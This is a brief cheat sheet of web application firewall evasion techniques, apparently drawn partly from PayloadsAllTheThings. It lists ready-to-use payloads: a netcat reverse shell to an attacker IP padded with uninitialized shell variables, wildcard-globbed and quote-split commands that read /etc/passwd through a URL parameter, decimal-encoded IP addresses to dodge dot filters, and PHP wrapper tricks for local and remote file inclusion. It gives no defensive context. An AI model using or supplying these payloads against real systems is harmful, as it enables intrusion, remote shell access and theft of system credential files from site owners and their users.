Web Application Firewall (WAF) Evasion Techniques #3
Uninitialized shell variables can be used for bypassing web application firewalls (WAF). Example: bypassing a filter to execute a reverse shell - nc$u -e /bin$u/bash$u <ip> <port>. If this doesn't work try adding spaces before and after the variable (note the +'s, this example is also URL encoded): nc+$u++-e+/bin$u/bash$u <ip> <port>($u in this case is a random attacker-picked variable that would hopefully be uninitialized on the target).
Bypass web filters by using bash wildcards:/???/?s/?cmd=%2f???%2f??t%20%2f???%2fp??s?? will bypass...and execute every command that matches. such as /bin/cat /etc/apt, and /bin/cat /etc/passwd
It is still understood by most programs and languages when converted to other formats, such as decimal, and avoids . character in filtered HTTP requests: 127.0.0.1 = 2130706433
Injecting IPs when . is disallowed: convert dotted-decimal format to decimal value - ip2dh
LFI / RFI by Bypassing Filters Using Wrappers
From PayloadsAllTheThingsphp://filter/ has multiple ways to bypass PHP input filters ;These can be chained with | or / : zip, data, expect, input, phar; many more different wrappers to try!
Standard: /bin/nc 127.0.0.1 1337
Evasion:/???/n? 2130706433 1337
Used chars: / ? n [0-9]
Standard: /bin/cat /etc/passwd
Evasion: /???/??t /???/??ss??
Used chars: / ? t s
$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
Can use \\ instead of ' as well
